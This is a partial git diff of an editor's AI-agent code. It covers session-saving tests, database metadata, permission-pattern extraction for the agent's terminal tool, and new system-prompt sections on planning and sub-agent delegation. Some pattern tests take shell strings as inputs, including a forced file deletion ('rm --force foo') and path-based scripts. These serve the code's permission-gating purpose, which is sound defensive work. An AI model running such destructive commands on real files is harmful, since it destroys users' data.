a provider blip: + // update_active_language_model_from_settings calls set_default_model(None) + // when it can't resolve the model, clearing all fallbacks. + cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry.set_default_model(None, cx); + }); + }); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "summarization model should survive a transient default model clearing" + ); + }); + } + #[gpui::test] async fn test_loaded_thread_preserves_thinking_enabled(cx: &mut TestAppContext) { init_test(cx); @@ -2288,16 +2532,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a thinking model. @@ -2324,9 +2561,11 @@ mod internal_tests { // Create a thread and select the thinking model. let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2371,7 +2610,9 @@ mod internal_tests { // Reload the thread and verify thinking_enabled is still true. let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2394,16 +2635,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a model where id() != name(), like real Anthropic models @@ -2431,9 +2665,11 @@ mod internal_tests { // Create a thread and select the model. let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2478,7 +2714,9 @@ mod internal_tests { // Reload the thread and verify the model was preserved. let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2513,23 +2751,16 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -2605,7 +2836,9 @@ mod internal_tests { cx.run_until_parked(); - // Set a draft prompt with rich content blocks before saving. + // Set a draft prompt with rich content blocks and scroll position + // AFTER run_until_parked, so the only save that captures these + // changes is the one performed by close_session itself. let draft_blocks = vec![ acp::ContentBlock::Text(acp::TextContent::new("Check out ")), acp::ContentBlock::ResourceLink(acp::ResourceLink::new("b.md", uri.to_string())), @@ -2620,8 +2853,6 @@ mod internal_tests { offset_in_item: gpui::px(12.5), })); }); - thread.update(cx, |_thread, cx| cx.notify()); - cx.run_until_parked(); // Close the session so it can be reloaded from disk. cx.update(|cx| connection.clone().close_session(&session_id, cx)) @@ -2642,7 +2873,9 @@ mod internal_tests { )] ); let acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); acp_thread.read_with(cx, |thread, cx| { @@ -2685,6 +2918,87 @@ mod internal_tests { }); } + #[gpui::test] + async fn test_close_session_saves_thread(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/", + json!({ + "a": { + "file.txt": "hello" + } + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + let model = Arc::new(FakeLanguageModel::default()); + thread.update(cx, |thread, cx| { + thread.set_model(model.clone(), cx); + }); + + // Send a message so the thread is non-empty (empty threads aren't saved). + let send = acp_thread.update(cx, |thread, cx| thread.send(vec!["hello".into()], cx)); + let send = cx.foreground_executor().spawn(send); + cx.run_until_parked(); + + model.send_last_completion_stream_text_chunk("world"); + model.end_last_completion_stream(); + send.await.unwrap(); + cx.run_until_parked(); + + // Set a draft prompt WITHOUT calling run_until_parked afterwards. + // This means no observe-triggered save has run for this change. + // The only way this data gets persisted is if close_session + // itself performs the save. + let draft_blocks = vec![acp::ContentBlock::Text(acp::TextContent::new( + "unsaved draft", + ))]; + acp_thread.update(cx, |thread, _cx| { + thread.set_draft_prompt(Some(draft_blocks.clone())); + }); + + // Close the session immediately — no run_until_parked in between. + cx.update(|cx| connection.clone().close_session(&session_id, cx)) + .await + .unwrap(); + cx.run_until_parked(); + + // Reopen and verify the draft prompt was saved. + let reloaded = agent + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) + .await + .unwrap(); + reloaded.read_with(cx, |thread, _| { + assert_eq!( + thread.draft_prompt(), + Some(draft_blocks.as_slice()), + "close_session must save the thread; draft prompt was lost" + ); + }); + } + fn thread_entries( thread_store: &Entity, cx: &mut TestAppContext, diff --git a/crates/agent/src/db.rs b/crates/agent/src/db.rs index 2c9b33e4efc4f22059e2914589ca6c635b51c0e5..bde07a040869bf11a1b95bf433bf6af1e2d0a932 100644 --- a/crates/agent/src/db.rs +++ b/crates/agent/src/db.rs @@ -25,11 +25,10 @@ pub type DbMessage = crate::Message; pub type DbSummary = crate::legacy_thread::DetailedSummaryState; pub type DbLanguageModel = crate::legacy_thread::SerializedLanguageModel; -#[derive(Debug, Clone, Serialize, Deserialize)] +#[derive(Debug, Clone)] pub struct DbThreadMetadata { pub id: acp::SessionId, pub parent_session_id: Option, - #[serde(alias = "summary")] pub title: SharedString, pub updated_at: DateTime, pub created_at: Option>, @@ -42,9 +41,10 @@ impl From<&DbThreadMetadata> for acp_thread::AgentSessionInfo { fn from(meta: &DbThreadMetadata) -> Self { Self { session_id: meta.id.clone(), - cwd: None, + work_dirs: Some(meta.folder_paths.clone()), title: Some(meta.title.clone()), updated_at: Some(meta.updated_at), + created_at: meta.created_at, meta: None, } } @@ -482,7 +482,10 @@ impl ThreadsDatabase { let data_type = DataType::Zstd; let data = compressed; - let created_at = Utc::now().to_rfc3339(); + // Use the thread's updated_at as created_at for new threads. + // This ensures the creation time reflects when the thread was conceptually + // created, not when it was saved to the database. + let created_at = updated_at.clone(); let mut insert = connection.exec_bound::<(Arc, Option>, Option, Option, String, String, DataType, Vec, String)>(indoc! {" INSERT INTO threads (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, data_type, data, created_at) @@ -877,7 +880,6 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert_eq!(threads[0].folder_paths, folder_paths); } #[gpui::test] @@ -897,7 +899,6 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert!(threads[0].folder_paths.is_empty()); } #[test] diff --git a/crates/agent/src/native_agent_server.rs b/crates/agent/src/native_agent_server.rs index 18c41670ac4b4ba3146fb207992a7020a44fbd5f..7f19f9005e3ff54e361f57075b7af06508476564 100644 --- a/crates/agent/src/native_agent_server.rs +++ b/crates/agent/src/native_agent_server.rs @@ -6,7 +6,8 @@ use agent_settings::AgentSettings; use anyhow::Result; use collections::HashSet; use fs::Fs; -use gpui::{App, Entity, SharedString, Task}; +use gpui::{App, Entity, Task}; +use project::{AgentId, Project}; use prompt_store::PromptStore; use settings::{LanguageModelSelection, Settings as _, update_settings_file}; @@ -25,8 +26,8 @@ impl NativeAgentServer { } impl AgentServer for NativeAgentServer { - fn name(&self) -> SharedString { - "Zed Agent".into() + fn agent_id(&self) -> AgentId { + crate::ZED_AGENT_ID.clone() } fn logo(&self) -> ui::IconName { @@ -35,11 +36,11 @@ impl AgentServer for NativeAgentServer { fn connect( &self, - delegate: AgentServerDelegate, + _delegate: AgentServerDelegate, + _project: Entity, cx: &mut App, ) -> Task>> { log::debug!("NativeAgentServer::connect"); - let project = delegate.project().clone(); let fs = self.fs.clone(); let thread_store = self.thread_store.clone(); let prompt_store = PromptStore::global(cx); @@ -49,9 +50,8 @@ impl AgentServer for NativeAgentServer { let prompt_store = prompt_store.await?; log::debug!("Creating native agent entity"); - let agent = - NativeAgent::new(project, thread_store, templates, Some(prompt_store), fs, cx) - .await?; + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates, Some(prompt_store), fs, cx)); // Create the connection wrapper let connection = NativeAgentConnection(agent); diff --git a/crates/agent/src/pattern_extraction.rs b/crates/agent/src/pattern_extraction.rs index 69a7abae32d6df9c2755e53292ab1c1a1b5341de..7015d69827d7286a1564ce0528ce4627059c49fb 100644 --- a/crates/agent/src/pattern_extraction.rs +++ b/crates/agent/src/pattern_extraction.rs @@ -1,4 +1,5 @@ -use shell_command_parser::extract_commands; +use acp_thread::PermissionPattern; +use shell_command_parser::{extract_commands, extract_terminal_command_prefix}; use std::path::{Path, PathBuf}; use url::Url; @@ -18,8 +19,8 @@ fn is_plain_command_token(token: &str) -> bool { } struct CommandPrefix { - command: String, - subcommand: Option, + normalized_tokens: Vec, + display: String, } /// Extracts the command name and optional subcommand from a shell command using @@ -30,59 +31,83 @@ struct CommandPrefix { /// syntax correctly. Returns `None` if parsing fails or if the command name /// contains path separators (for security reasons). fn extract_command_prefix(command: &str) -> Option { - let commands = extract_commands(command)?; - let first_command = commands.first()?; + let prefix = extract_terminal_command_prefix(command)?; - let mut tokens = first_command.split_whitespace(); - let first_token = tokens.next()?; - - // Only allow alphanumeric commands with hyphens/underscores. - // Reject paths like "./script.sh" or "/usr/bin/python" to prevent - // users from accidentally allowing arbitrary script execution. - if !is_plain_command_token(first_token) { + if !is_plain_command_token(&prefix.command) { return None; } - // Include the subcommand (second non-flag token) when present, to produce - // more specific patterns like "cargo test" instead of just "cargo". - let subcommand = tokens - .next() - .filter(|second_token| is_plain_command_token(second_token)) - .map(|second_token| second_token.to_string()); - Some(CommandPrefix { - command: first_token.to_string(), - subcommand, + normalized_tokens: prefix.tokens, + display: prefix.display, }) } -/// Extracts a regex pattern from a terminal command based on the first token (command name). +/// Extracts a regex pattern and display name from a terminal command. /// /// Returns `None` for commands starting with `./`, `/`, or other path-like prefixes. /// This is a deliberate security decision: we only allow pattern-based "always allow" /// rules for well-known command names (like `cargo`, `npm`, `git`), not for arbitrary /// scripts or absolute paths which could be manipulated by an attacker. +pub fn extract_terminal_permission_pattern(command: &str) -> Option { + let pattern = extract_terminal_pattern(command)?; + let display_name = extract_terminal_pattern_display(command)?; + Some(PermissionPattern { + pattern, + display_name, + }) +} + pub fn extract_terminal_pattern(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - let escaped_command = regex::escape(&prefix.command); - Some(match &prefix.subcommand { - Some(subcommand) => { - format!( - "^{}\\s+{}(\\s|$)", - escaped_command, - regex::escape(subcommand) - ) - } - None => format!("^{}\\b", escaped_command), - }) + let tokens = prefix.normalized_tokens; + + match tokens.as_slice() { + [] => None, + [single] => Some(format!("^{}\\b", regex::escape(single))), + [rest @ .., last] => Some(format!( + "^{}\\s+{}(\\s|$)", + rest.iter() + .map(|token| regex::escape(token)) + .collect::>() + .join("\\s+"), + regex::escape(last) + )), + } } pub fn extract_terminal_pattern_display(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - match prefix.subcommand { - Some(subcommand) => Some(format!("{} {}", prefix.command, subcommand)), - None => Some(prefix.command), + Some(prefix.display) +} + +/// Extracts patterns for ALL commands in a pipeline, not just the first one. +/// +/// For a command like `"cargo test 2>&1 | tail"`, this returns patterns for +/// both `cargo` and `tail`. Path-based commands (e.g. `./script.sh`) are +/// filtered out, and duplicate command names are deduplicated while preserving +/// order. +pub fn extract_all_terminal_patterns(command: &str) -> Vec { + let commands = match extract_commands(command) { + Some(commands) => commands, + None => return Vec::new(), + }; + + let mut results = Vec::new(); + + for cmd in &commands { + let Some(permission_pattern) = extract_terminal_permission_pattern(cmd) else { + continue; + }; + + if results.contains(&permission_pattern) { + continue; + } + + results.push(permission_pattern); } + + results } pub fn extract_path_pattern(path: &str) -> Option { @@ -208,9 +233,24 @@ mod tests { assert!(!pattern.is_match("cargo build-foo")); assert!(!pattern.is_match("cargo builder")); + // Env-var prefixes are included in generated patterns + assert_eq!( + extract_terminal_pattern("PAGER=blah git log --oneline"), + Some("^PAGER=blah\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("A=1 B=2 git log"), + Some("^A=1\\s+B=2\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("PAGER='less -R' git log"), + Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string()) + ); + // Path-like commands are rejected assert_eq!(extract_terminal_pattern("./script.sh arg"), None); assert_eq!(extract_terminal_pattern("/usr/bin/python arg"), None); + assert_eq!(extract_terminal_pattern("PAGER=blah ./script.sh arg"), None); } #[test] @@ -235,6 +275,74 @@ mod tests { extract_terminal_pattern_display("ls"), Some("ls".to_string()) ); + assert_eq!( + extract_terminal_pattern_display("PAGER=blah git log --oneline"), + Some("PAGER=blah git log".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("PAGER='less -R' git log"), + Some("PAGER='less -R' git log".to_string()) + ); + } + + #[test] + fn test_terminal_pattern_regex_normalizes_whitespace() { + let pattern = extract_terminal_pattern("PAGER=blah git log --oneline") + .expect("expected terminal pattern"); + let regex = regex::Regex::new(&pattern).expect("expected valid regex"); + + assert!(regex.is_match("PAGER=blah git log")); + assert!(regex.is_match("PAGER=blah git log --stat")); + } + + #[test] + fn test_extract_terminal_pattern_skips_redirects_before_subcommand() { + assert_eq!( + extract_terminal_pattern("git 2>/dev/null log --oneline"), + Some("^git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("git 2>/dev/null log --oneline"), + Some("git 2>/dev/null log".to_string()) + ); + + assert_eq!( + extract_terminal_pattern("rm --force foo"), + Some("^rm\\b".to_string()) + ); + } + + #[test] + fn test_extract_all_terminal_patterns_pipeline() { + assert_eq!( + extract_all_terminal_patterns("cargo test 2>&1 | tail"), + vec![ + PermissionPattern { + pattern: "^cargo\\s+test(\\s|$)".to_string(), + display_name: "cargo test".to_string(), + }, + PermissionPattern { + pattern: "^tail\\b".to_string(), + display_name: "tail".to_string(), + }, + ] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_with_path_commands() { + assert_eq!( + extract_all_terminal_patterns("./script.sh | grep foo"), + vec![PermissionPattern { + pattern: "^grep\\s+foo(\\s|$)".to_string(), + display_name: "grep foo".to_string(), + }] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_all_paths() { + assert_eq!(extract_all_terminal_patterns("./a.sh | /usr/bin/b"), vec![]); } #[test] diff --git a/crates/agent/src/templates.rs b/crates/agent/src/templates.rs index db787d834e63746fdbea9e837f4fd0615f85c984..103fde17fd4d865b346a428e1f23e335005afe88 100644 --- a/crates/agent/src/templates.rs +++ b/crates/agent/src/templates.rs @@ -85,6 +85,7 @@ mod tests { let templates = Templates::new(); let rendered = template.render(&templates).unwrap(); assert!(rendered.contains("## Fixing Diagnostics")); + assert!(!rendered.contains("## Planning")); assert!(rendered.contains("test-model")); } } diff --git a/crates/agent/src/templates/system_prompt.hbs b/crates/agent/src/templates/system_prompt.hbs index 48e3e586a84438ca9b97f94a24f3710bfc3360b6..67c920707289173ac4c7c1c9d98a8cd64126eb89 100644 --- a/crates/agent/src/templates/system_prompt.hbs +++ b/crates/agent/src/templates/system_prompt.hbs @@ -20,6 +20,34 @@ You are a highly skilled software engineer with extensive knowledge in many prog - When running commands that may run indefinitely or for a long time (such as build scripts, tests, servers, or file watchers), specify `timeout_ms` to bound runtime. If the command times out, the user can always ask you to run it again with a longer timeout or no timeout if they're willing to wait or cancel manually. - Avoid HTML entity escaping - use plain characters instead. +{{#if (contains available_tools 'update_plan') }} +## Planning + +- You have access to an `update_plan` tool which tracks steps and progress and renders them to the user. +- Use it to show that you've understood the task and to make complex, ambiguous, or multi-phase work easier for the user to follow. +- A good plan breaks the work into meaningful, logically ordered steps that are easy to verify as you go. +- When writing a plan, prefer a short list of concise, concrete steps. +- Keep each step focused on a real unit of work and use short 1-sentence descriptions. +- Do not use plans for simple or single-step queries that you can just do or answer immediately. +- Do not use plans to pad your response with filler steps or to state the obvious. +- Do not include steps that you are not actually capable of doing. +- After calling `update_plan`, do not repeat the full plan in your response. The UI already displays it. Instead, briefly summarize what changed and note any important context or next step. +- Before moving on to a new phase of work, mark the previous step as completed when appropriate. +- When work is in progress, prefer having exactly one step marked as `in_progress`. +- You can mark multiple completed steps in a single `update_plan` call. +- If the task changes midway through, update the plan so it reflects the new approach. + +Use a plan when: + +- The task is non-trivial and will require multiple actions over a longer horizon. +- There are logical phases or dependencies where sequencing matters. +- The work has ambiguity that benefits from outlining high-level goals. +- You want intermediate checkpoints for feedback and validation. +- The user asked you to do more than one thing in a single prompt. +- The user asked you to use the plan tool or TODOs. +- You discover additional steps while working and intend to complete them before yielding to the user. + +{{/if}} ## Searching and Reading If you are unsure how to fulfill the user's request, gather more information with tool calls and/or clarifying questions. @@ -146,6 +174,22 @@ Otherwise, follow debugging best practices: 2. When selecting which version of an API or package to use, choose one that is compatible with the user's dependency management file(s). If no such file exists or if the package is not present, use the latest version that is in your training data. 3. If an external API requires an API Key, be sure to point this out to the user. Adhere to best security practices (e.g. DO NOT hardcode an API key in a place where it can be exposed) +{{#if (contains available_tools 'spawn_agent') }} +## Multi-agent delegation +Sub-agents can help you move faster on large tasks when you use them thoughtfully. This is most useful for: +* Very large tasks with multiple well-defined scopes +* Plans with multiple independent steps that can be executed in parallel +* Independent information-gathering tasks that can be done in parallel +* Requesting a review from another agent on your work or another agent's work +* Getting a fresh perspective on a difficult design or debugging question +* Running tests or config commands that can output a large amount of logs when you want a concise summary. Because you only receive the subagent's final message, ask it to include the relevant failing lines or diagnostics in its response. + +When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. If multiple agents might edit files, assign them disjoint write scopes. + +This feature must be used wisely. For simple or straightforward tasks, prefer doing the work directly instead of spawning a new agent. + +{{/if}} + ## System Information Operating System: {{os}} diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index d33c80a435e84359976d4d8a9edb2bdebd66e0ff..8a291a89e2f2a18b6180d288179406a8ba527d25 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -48,7 +48,7 @@ use std::{ rc::Rc, sync::{ Arc, - atomic::{AtomicBool, Ordering}, + atomic::{AtomicBool, AtomicUsize, Ordering}, }, time::Duration, }; @@ -58,14 +58,14 @@ mod edit_file_thread_test; mod test_tools; use test_tools::*; -fn init_test(cx: &mut TestAppContext) { +pub(crate) fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); }); } -struct FakeTerminalHandle { +pub(crate) struct FakeTerminalHandle { killed: Arc, stopped_by_user: Arc, exit_sender: std::cell::RefCell>>, @@ -75,7 +75,7 @@ struct FakeTerminalHandle { } impl FakeTerminalHandle { - fn new_never_exits(cx: &mut App) -> Self { + pub(crate) fn new_never_exits(cx: &mut App) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); @@ -99,7 +99,7 @@ impl FakeTerminalHandle { } } - fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { + pub(crate) fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); let (exit_sender, _exit_receiver) = futures::channel::oneshot::channel(); @@ -118,15 +118,15 @@ impl FakeTerminalHandle { } } - fn was_killed(&self) -> bool { + pub(crate) fn was_killed(&self) -> bool { self.killed.load(Ordering::SeqCst) } - fn set_stopped_by_user(&self, stopped: bool) { + pub(crate) fn set_stopped_by_user(&self, stopped: bool) { self.stopped_by_user.store(stopped, Ordering::SeqCst); } - fn signal_exit(&self) { + pub(crate) fn signal_exit(&self) { if let Some(sender) = self.exit_sender.borrow_mut().take() { let _ = sender.send(()); } @@ -178,18 +178,23 @@ impl SubagentHandle for FakeSubagentHandle { } #[derive(Default)] -struct FakeThreadEnvironment { +pub(crate) struct FakeThreadEnvironment { terminal_handle: Option>, subagent_handle: Option>, + terminal_creations: Arc, } impl FakeThreadEnvironment { - pub fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { + pub(crate) fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { Self { terminal_handle: Some(terminal_handle.into()), ..self } } + + pub(crate) fn terminal_creation_count(&self) -> usize { + self.terminal_creations.load(Ordering::SeqCst) + } } impl crate::ThreadEnvironment for FakeThreadEnvironment { @@ -200,6 +205,7 @@ impl crate::ThreadEnvironment for FakeThreadEnvironment { _output_byte_limit: Option, _cx: &mut AsyncApp, ) -> Task>> { + self.terminal_creations.fetch_add(1, Ordering::SeqCst); let handle = self .terminal_handle .clone() @@ -835,14 +841,20 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { // Approve the first - send "allow" option_id (UI transforms "once" to "allow") tool_call_auth_1 .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); cx.run_until_parked(); // Reject the second - send "deny" option_id directly since Deny is now a button tool_call_auth_2 .response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); cx.run_until_parked(); @@ -886,8 +898,9 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { let tool_call_auth_3 = next_tool_call_authorization(&mut events).await; tool_call_auth_3 .response - .send(acp::PermissionOptionId::new( - "always_allow:tool_requiring_permission", + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("always_allow:tool_requiring_permission"), + acp::PermissionOptionKind::AllowAlways, )) .unwrap(); cx.run_until_parked(); @@ -995,6 +1008,20 @@ async fn expect_tool_call_update_fields( } } +async fn expect_plan(events: &mut UnboundedReceiver>) -> acp::Plan { + let event = events + .next() + .await + .expect("no plan event received") + .unwrap(); + match event { + ThreadEvent::Plan(plan) => plan, + event => { + panic!("Unexpected event {event:?}"); + } + } +} + async fn next_tool_call_authorization( events: &mut UnboundedReceiver>, ) -> ToolCallAuthorization { @@ -1177,32 +1204,88 @@ fn test_permission_option_ids_for_terminal() { panic!("Expected dropdown permission options"); }; - let allow_ids: Vec = choices - .iter() - .map(|choice| choice.allow.option_id.0.to_string()) - .collect(); - let deny_ids: Vec = choices - .iter() - .map(|choice| choice.deny.option_id.0.to_string()) - .collect(); + // Expect 3 choices: always-tool, always-pattern, once + assert_eq!(choices.len(), 3); - assert!(allow_ids.contains(&"always_allow:terminal".to_string())); - assert!(allow_ids.contains(&"allow".to_string())); - assert!( - allow_ids - .iter() - .any(|id| id.starts_with("always_allow_pattern:terminal\n")), - "Missing allow pattern option" + // First two choices both use the tool-level option IDs + assert_eq!( + choices[0].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[0].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert!(choices[0].sub_patterns.is_empty()); - assert!(deny_ids.contains(&"always_deny:terminal".to_string())); - assert!(deny_ids.contains(&"deny".to_string())); - assert!( - deny_ids - .iter() - .any(|id| id.starts_with("always_deny_pattern:terminal\n")), - "Missing deny pattern option" + assert_eq!( + choices[1].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[1].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert_eq!(choices[1].sub_patterns, vec!["^cargo\\s+build(\\s|$)"]); + + // Third choice is the one-time allow/deny + assert_eq!(choices[2].allow.option_id.0.as_ref(), "allow"); + assert_eq!(choices[2].deny.option_id.0.as_ref(), "deny"); + assert!(choices[2].sub_patterns.is_empty()); +} + +#[test] +fn test_permission_options_terminal_pipeline_produces_dropdown_with_patterns() { + let permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["cargo test 2>&1 | tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { + choices, + patterns, + tool_name, + } = permission_options + else { + panic!("Expected DropdownWithPatterns permission options for pipeline command"); + }; + + assert_eq!(tool_name, TerminalTool::NAME); + + // Should have "Always for terminal" and "Only this time" choices + assert_eq!(choices.len(), 2); + let labels: Vec<&str> = choices + .iter() + .map(|choice| choice.allow.name.as_ref()) + .collect(); + assert!(labels.contains(&"Always for terminal")); + assert!(labels.contains(&"Only this time")); + + // Should have per-command patterns for "cargo test" and "tail" + assert_eq!(patterns.len(), 2); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"cargo test")); + assert!(pattern_names.contains(&"tail")); + + // Verify patterns are valid regex patterns + let regex_patterns: Vec<&str> = patterns.iter().map(|cp| cp.pattern.as_str()).collect(); + assert!(regex_patterns.contains(&"^cargo\\s+test(\\s|$)")); + assert!(regex_patterns.contains(&"^tail\\b")); +} + +#[test] +fn test_permission_options_terminal_pipeline_with_chaining() { + let permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["npm install && npm test | tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { patterns, .. } = permission_options else { + panic!("Expected DropdownWithPatterns for chained pipeline command"); + }; + + // With subcommand-aware patterns, "npm install" and "npm test" are distinct + assert_eq!(patterns.len(), 3); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"npm install")); + assert!(pattern_names.contains(&"npm test")); + assert!(pattern_names.contains(&"tail")); } #[gpui::test] @@ -3048,7 +3131,7 @@ async fn test_title_generation(cx: &mut TestAppContext) { fake_model.send_last_completion_stream_text_chunk("Hey!"); fake_model.end_last_completion_stream(); cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "New Thread")); + thread.read_with(cx, |thread, _| assert_eq!(thread.title(), None)); // Ensure the summary model has been invoked to generate a title. summary_model.send_last_completion_stream_text_chunk("Hello "); @@ -3057,7 +3140,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { summary_model.end_last_completion_stream(); send.collect::>().await; cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); // Send another message, ensuring no title is generated this time. let send = thread @@ -3071,7 +3156,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { cx.run_until_parked(); assert_eq!(summary_model.pending_completions(), Vec::new()); send.collect::>().await; - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); } #[gpui::test] @@ -3177,20 +3264,12 @@ async fn test_agent_connection(cx: &mut TestAppContext) { let fake_fs = cx.update(|cx| fs::FakeFs::new(cx.background_executor().clone())); fake_fs.insert_tree(path!("/test"), json!({})).await; let project = Project::test(fake_fs.clone(), [Path::new("/test")], cx).await; - let cwd = Path::new("/test"); + let cwd = PathList::new(&[Path::new("/test")]); let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create agent and connection - let agent = NativeAgent::new( - project.clone(), - thread_store, - templates.clone(), - None, - fake_fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates.clone(), None, fake_fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread using new_thread @@ -3364,6 +3443,122 @@ async fn test_tool_updates_to_completion(cx: &mut TestAppContext) { ); } +#[gpui::test] +async fn test_update_plan_tool_updates_thread_events(cx: &mut TestAppContext) { + let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await; + thread.update(cx, |thread, _cx| thread.add_tool(UpdatePlanTool)); + let 